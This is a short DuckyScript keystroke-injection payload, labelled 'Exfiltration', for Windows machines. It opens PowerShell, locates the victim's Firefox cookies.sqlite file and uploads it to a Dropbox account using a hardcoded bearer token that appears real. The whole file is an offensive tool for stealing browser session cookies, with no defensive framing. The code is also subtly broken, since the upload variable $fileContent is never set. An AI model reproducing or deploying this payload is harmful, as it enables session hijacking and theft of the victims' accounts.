
REM ####################################################
REM #                                                  |
REM # Title        : Export Firefox Cookies Database   |
REM # Author       : Zenin                             |
REM # Version      : 1.0                               |
REM # Category     : Exfiltration                      |
REM # Target       : Windows 10-11                     |
REM #                                                  |
REM ####################################################

DEFINE DROPBOX_ACCESS_TOKEN "example"


DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 2000


STRINGLN
    $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
    $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}

    $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'

END_STRINGLN

STRING $accessToken = 
STRING sl.BodKlFFkI0nF219HjeFTLX_xNyK9dU372W8uKzwmSoGv-OKqJPlzv2S9RczCurcjV8nsxcMGKbzPiKahjJ3eZ1pI1roVW4Brj2J_tAPKuUlYIW_9zWhRUqyF0HpPZsu_fJV1IoS0Ha5D
ENTER

STRINGLN
    $authHeader = @{Authorization = "Bearer $accessToken"}
    $dropboxFilePath = "/cookies_exported.sqlite"

    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"

    $headers = @{}
    $headers.Add("Authorization", "Bearer $accessToken")
    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
    $headers.Add("Content-Type", "application/octet-stream")

    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent; exit;
END_STRINGLN